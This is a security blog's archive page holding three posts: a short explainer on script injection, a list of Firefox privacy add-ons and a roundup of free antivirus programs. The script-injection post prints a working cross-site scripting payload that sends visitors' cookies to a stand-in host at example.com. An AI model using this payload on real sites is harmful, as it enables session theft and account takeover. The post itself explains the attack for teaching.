Browsing posts in: Security
Apr 2, 2013    |      Comments Off on A word on script injection attacks

A word on script injection attacks

The scenario

Say your application – whether it is written in NodeJS or PHP or Ruby or whatever – has a form where Joe the User can input data (may be a profile edit page). The data entered by Joe is displayed to other users (Sam and Woody) when they visit Joe’s profile page. This would be a perfectly ok situation if Joe is a nice person, doing an honest days work to earn a living.

The problem

But unfortunately, Joe could be a hacker trying to steal Sam’s digital identity (and/or money). Or, most commonly, Joe could be a zombie looking around for security loopholes for malicious hackers to exploit. Oh, yeah, zombies are real. We call them bots in the digital world.
In any case, our incarnation or evil, Mr. Joe could enter a content like this into his profile update textarea:-

<script>
document.body.innerHTML += '<iframe height="1" width="1" src="http://example.com/save-cookie.php?cookie-data='+encodeURIComponent(document.cookie)+'"></iframe>';
</script>

The above 1 line code is self explanatory. The code, if rendered as it is, will steal the currently logged in person’s (Sam’s) cookies and could send it the malicious hacker Joe. With Sam’s cookie data in hand, Joe can login to the site as Sam and access Sam’s private data or can do things on behalf of Sam.

Continue Reading

Sep 3, 2010    |       6 comments

13+ Firefox Addons to Improve Your Online Safety and Privacy

[updated: December 2012]

1. TorButton

Complete anonymity is not possible on the internet. Tor is the next best thing available. Tor is one of the best privacy softwares available. Tor is recommended by EFF, who is the biggest advocate of online privacy. TorButton will make it easy to make firefox use Tor. Though it is the best for privacy online, configuring Tor may be a bit of a pain for first timers. If you install Tor, it will install the TorButton Firefox addon also. To download Tor, visit the Tor website.

2. NoScript

If Tor is the king of privacy, then NoScript is the king of security. NoScript protects you by blocking unauthorized sites from running scripts and programs in your computer. NoScript offers protection against cross site scripting attacks, router hacking, click jacking etc. NoScript is very much recommended, no matter you are a newbie or an experienced user.

3. WOT

WOT provides you information regarding websites’ trustworthiness based on ratings provided by a global community of users. Users rate websites based on their experiences, so you can know if you can trust a site before entering it. WOT will warn you about sites with low reputation (read it as dangerous websites) and hence will protect you from scams, phishing sites etc

4. FoxyProxy

Proxies are the easiest means to get basic anonymity on the web. By using a proxy, you can hide your IP address and thereby your exact physical location from the websites you visit. FoxyProxy will make firefox access sites through proxies, hence hiding information about you. FoxyProxy has advanced features and newbies may find it a lil complex. In that case, you can use Proxilla, which is relatively easy to use.

5. BetterPrivacy

The tracking ability of normal cookies is low. So internet marketing and research groups have come up with a more persistent way to track users – Flash Cookies (aka LSO‘s). Flash cookies offer more storage – 100 kb, as opposed to the 4 kb offered by normal cookies – and can’t be removed as easily as normal cookies. An alarmingly large number of websites now use flash cookies to track users. BetterPrivacy can protect you from flash cookies.

6. Roboform Password Manager or Secure Login

It is not safe to use the same password with multiple sites. But keeping track of different complex passwords for different sites is difficult. Here is where password managers come to rescue us. Password managers can store login information securely and can make it easily and securely accessible for us. Roboform password manager offers everything you need – easy access, encrypted storage, form filling etc.

Secure Login is another powerful password manager offering lot of useful features and stuff.

7. Enigform

Enigform protects our data and traffic by digitally signing our HTTP requests (including AJAX calls). The technique used is pretty impressive. It brings OpenPGP signing and encryption to HTTP traffic. Please keep in mind that Enigform can work its magic only if the website you are visiting runs on a mod_openpgp enabled Apache web server.

8. CookieSwap

Are you logged into your email account and some other important websites and need to open a suspicious looking site. Doing that may compromise the your important accounts. Then CookieSwap is for you. This addon will let you switch your firefox’s profile, hence hiding the active cookies. This addon can also be used for signing into multiple gmail/yahoo accounts at the same time. This is a very useful addon which I previously reviewed here among 25 Incredibly Useful and Cool Firefox Addons for Geeks and Web Developers.

9. Ghostery

Every single website you visit is tracking you. They are spying you to know your personal details such as browsing habits, interests and even sexual orientation. With Ghostery, you can see who is tracking can learn more about them, such as their privacy policy etc. Ghostery also makes it easy to block tracking codes and cookies from sites of your choice.

10. Close’n forget

This addon can close the current tab and forget everything about the visit. Close’n forget will delete the cookies, history and every information about that site. (This addon MAY not clear all the data about your visit. Please check if it is working as it should before you try something serious)

11. LongURL

Now we come across shortened links every day in our life. Almost every link posted in twitter and email newsletters are now cloaked by some sort of a URL shortening service. It is really REALLY important to know where a URL is taking you before you click it. One normal looking wrong link can devastate you. The LongURL addon can find where shortened links take you. So be sure before you clink. (This addon don’t work with the latest version of firefox yet)

12. TabRenamizer

People always just love to watch over our shoulders and read the titles of our opened tabs. TabRenamizer is the solution against such prying eyes. With one click, you can rename your tab titles to something more.. serene.

13. Fission

Fission is not exactly a security or privacy addon. But it makes it easy for us to spot the domain name from the URL. Scammes and phishers (bad people) use URL’s closely matching to genuine ones to carry our phishing attacks. They may create a fake gmail login page at some location like www.google.com-accountLogin.some-domain-name.com. Such addresses are easy and inexpensive to create. Unsuspecting users may read only the www.google.com in front of the URL and type in their username and password thinking that it is the legitimate site.

I have stated the importance of taking notice of the address bar in a previous article – 7 Points to Stay Safe in the Social Web.

The Fission addon can highlight the actual root domain, making it easy to recognize fake URL’s. See below how the fake URL is easily spottable with Fission enabled.

So have you used any of these addons? Do you know or recommend any other security/privacy addon? Please share your knowledge with others through the comments.

 

14. HTTPS Everywhere

HTTPS Everywhere is a useful addon developed by the Electronic Frontier Foundation, the leading digital privacy advocacy group. This addon will enable secure connection when you connect to popular websites (if the sites actually support it). A version of this addon for Google Chrome browser also is available at the above link.

 

Lighter Side

Image Source: Geek and Poke

Aug 22, 2010    |      1 comment

Top 5 Free Antivirus Softwares for Personal Use

Here is the list of the top 5 free anti-virus softwares. The statistics and rankings are collected from all over the web, especially from security related user communities and download sites such as download.com and softpedia. Why spend money when you can get top class virus protection just for free. All of the security softwares reviewed here are as competent as the paid products or even better. Please share your views through comments.

AVG

1. AVG Free

AVG is my favorite anti-virus and I have been using it for almost 5 years now. Not just me, it seems to be the world’s favorite antivirus program. AVG is the most downloaded anti-virus according to CNET’s download.com. AVG is far better than most paid anti-virus programs and is light weight and is less intrusive. AVG has paid versions also, but the free version itself does almost everything a personal user needs. Contains an anti-spyware tool, email scanner link scanner etc.

Avira

2. Avira Free

Avira is my second choice after AVG. The only thing I do not like about Avira is that when it detects something, it displays a warning box each time and produces a beep sound from the CPU buzzer. I personally find it very annoying, but I have a lot of geek and normal friends who have been using Avira for years and would swear on its name.

Avast

3. Avast

Avast is currently the second most popular anti-virus software, kicking Avira from its position. The user interface is very easy and less confusing than that of its previous version. Avast offers good protection also. It has other real-time shields such as anti-spyware.

Microsoft Security Essentials

4. Microsoft Security Essentials

Microsoft Security Essentials is a sleek, light weight utility that requires very little system resources and does its job pretty well. MS Security Essentials runs good even in older systems. The user interface is so easy that even your cat can use it. Unlike the other anti-virus softwares mentioned here, MS Security Essentials do not have a paid version and it is likely to stay free always.

Malwarebytes Anti-Malware

5. Malwarebytes

Malwarebytes Anti-Malware is best when used as a compliment with your regular anti-virus program. Malwarebytes do not run in the background and provide constant protection for your system, but it will come handy when you need a quick virus scan and removal. But realtime protection, scheduled scanning and automatic updates are paid features and not available in the free version.

Have you used these anti-virus programs? Which is your favorite? Share your experience with the fellow readers through comments below.